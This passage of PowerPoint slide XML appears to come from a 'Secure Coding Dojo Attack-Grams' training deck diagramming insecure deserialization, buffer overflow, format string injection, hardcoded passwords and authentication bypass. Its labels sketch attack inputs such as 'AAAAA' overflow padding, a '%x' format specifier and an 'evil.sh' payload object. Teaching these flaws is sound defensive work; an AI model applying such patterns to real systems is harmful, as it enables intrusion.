          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720360" y="2090880"/>
            <a:ext cx="1176120" cy="1089720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576440" y="3556440"/>
            <a:ext cx="1389960" cy="1350360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 14" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503160" y="3579480"/>
            <a:ext cx="1490760" cy="1254960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 15" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430600" y="3576600"/>
            <a:ext cx="1379160" cy="1309680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243560" y="3593520"/>
            <a:ext cx="1389960" cy="1328760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Picture 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061560" y="3600720"/>
            <a:ext cx="1189440" cy="1321560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 18" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476000" y="5137200"/>
            <a:ext cx="1410840" cy="1233360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3421080" y="5071680"/>
            <a:ext cx="1440000" cy="1174680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468920" y="5084280"/>
            <a:ext cx="1089000" cy="896760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9068040" y="5075640"/>
            <a:ext cx="1514880" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="451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Secure Coding Dojo Attack-Grams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" name="Picture 24" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442840" y="5071680"/>
            <a:ext cx="1305720" cy="121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699120" y="284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Insecure Deserialization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80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2723760" y="1567440"/>
            <a:ext cx="1371240" cy="1666080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="381" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2037600" y="4613760"/>
            <a:ext cx="1050120" cy="1548720"/>
            <a:chOff x="2037600" y="4613760"/>
            <a:chExt cx="1050120" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="382" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2048040" y="461376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3" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2037600" y="5524200"/>
              <a:ext cx="105012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384" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="382" idx="0"/>
            <a:endCxn id="380" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2276280" y="3481200"/>
            <a:ext cx="1380600" cy="885600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2696400" y="1240200"/>
            <a:ext cx="1426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Book Store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6" name="Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3088080" y="2468520"/>
            <a:ext cx="481320" cy="494280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462240" y="2971440"/>
            <a:ext cx="156528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Courier New"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh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8" name="Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506600" y="3782520"/>
            <a:ext cx="574560" cy="574560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="389" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3751200" y="4389480"/>
            <a:ext cx="1769040" cy="1498680"/>
            <a:chOff x="3751200" y="4389480"/>
            <a:chExt cx="1769040" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="390" name="Graphic 24" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3902400" y="438948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91" name="Graphic 25" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4237920" y="457308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2" name="TextBox 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3751200" y="5524200"/>
              <a:ext cx="17690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Regular Users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93" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279080" y="4389480"/>
            <a:ext cx="13546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Command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Object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94" name="Curved Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="390" idx="0"/>
            <a:endCxn id="380" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3315960" y="3326760"/>
            <a:ext cx="1156320" cy="969480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24976"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:lumMod val="65000"/>
                <a:lumOff val="35000"/>
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="395" name="Graphic 32" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754160" y="3549960"/>
            <a:ext cx="872640" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4886280" y="4323240"/>
            <a:ext cx="923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Book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Object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1261440" y="417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Buffer Overflow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98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3672720" y="1894320"/>
            <a:ext cx="2026440" cy="2461680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="399" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="2649240"/>
            <a:ext cx="1050120" cy="1548360"/>
            <a:chOff x="1329120" y="2649240"/>
            <a:chExt cx="1050120" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="400" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="264924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01" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="3559320"/>
              <a:ext cx="105012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02" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="400" idx="3"/>
            <a:endCxn id="398" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291400" y="3125160"/>
            <a:ext cx="1381680" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2110320" y="2702520"/>
            <a:ext cx="1302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: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AAAAA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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009320" y="1530720"/>
            <a:ext cx="1144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TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970440" y="2500920"/>
            <a:ext cx="13089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 =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AAAA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 =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i!\0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1232640" y="57240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Format String Injection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07" name="Picture 3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2762280" y="1922040"/>
            <a:ext cx="2026440" cy="2461680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="408" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061280" y="2640240"/>
            <a:ext cx="1050120" cy="1548720"/>
            <a:chOff x="1061280" y="2640240"/>
            <a:chExt cx="1050120" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="409" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1071720" y="264024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0" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1061280" y="3550680"/>
              <a:ext cx="105012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11" name="Curved Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="409" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2023920" y="3111120"/>
            <a:ext cx="968040" cy="5400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38950"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178720" y="2760120"/>
            <a:ext cx="533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%x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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214440" y="1640160"/>
            <a:ext cx="1144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TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2959200" y="2910600"/>
            <a:ext cx="1654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secret =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15" name="Curved Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1086840" cy="12960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25016"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="1542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printf("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%x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7" name="Picture 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639760" y="2492640"/>
            <a:ext cx="1074600" cy="1264680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5658480" y="2092680"/>
            <a:ext cx="1008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Log file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TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855760" y="2894760"/>
            <a:ext cx="614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1232640" y="57240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Hardcoded Password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21" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762280" y="1922040"/>
            <a:ext cx="2026440" cy="2461680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="422" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="989280" y="2640240"/>
            <a:ext cx="1224720" cy="1365840"/>
            <a:chOff x="989280" y="2640240"/>
            <a:chExt cx="1224720" cy="1365840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="423" name="Graphic 1" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1001520" y="2640240"/>
              <a:ext cx="1110600" cy="1047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4" name="TextBox 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="989280" y="3641400"/>
              <a:ext cx="122472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25" name="Curved Connector 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2023920" y="3111120"/>
            <a:ext cx="968040" cy="5400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38950"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214440" y="1640160"/>
            <a:ext cx="1144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Program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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2959200" y="2910600"/>
            <a:ext cx="1654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secret = </a:t>
            </a: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28" name="Curved Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647240" y="3098520"/>
            <a:ext cx="1086840" cy="12960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25016"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433400" y="2726280"/>
            <a:ext cx="1542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Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="3837" r="2090" b="67680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783760" y="2492640"/>
            <a:ext cx="1074600" cy="1264680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1828800"/>
            <a:ext cx="1307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Privileged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Access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TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872240" y="2726280"/>
            <a:ext cx="614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123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57160" y="704880"/>
            <a:ext cx="10515240" cy="54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Authentication Bypass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72" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1247760" y="1408680"/>
            <a:ext cx="3631680" cy="3780720"/>
            <a:chOff x="1247760" y="1408680"/>
            <a:chExt cx="3631680" cy="3780720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="Picture 4" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391200" y="1408680"/>
              <a:ext cx="718200" cy="925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4" name="Picture 6" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="1431720"/>
              <a:ext cx="718200" cy="872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5" name="TextBox 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507320" y="2237760"/>
              <a:ext cx="732600" cy="91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/login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" name="TextBox 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249360" y="2226960"/>
              <a:ext cx="1173240" cy="91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/restricted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77" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3363840" y="361296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78" name="Group 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1247760" y="3469680"/>
              <a:ext cx="1769040" cy="1498320"/>
              <a:chOff x="1247760" y="3469680"/>
              <a:chExt cx="1769040" cy="1498320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="Graphic 17" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1398960" y="3469680"/>
                <a:ext cx="952200" cy="9522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0" name="Graphic 18" descr=""/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1734480" y="3652920"/>
                <a:ext cx="952200" cy="9522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81" name="TextBox 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1247760" y="4604040"/>
                <a:ext cx="176904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</a:rPr>
                  <a:t>Regular Users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82" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384360" y="4551120"/>
              <a:ext cx="96012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83" name="Curved Connector 22"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="79" idx="0"/>
              <a:endCxn id="75" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1" rot="16200000">
              <a:off x="1714680" y="3309120"/>
              <a:ext cx="319680" cy="1800"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 24915"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="44450">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:tailEnd len="med" type="triangle" w="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="84" name="Curved Connector 25"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="75" idx="2"/>
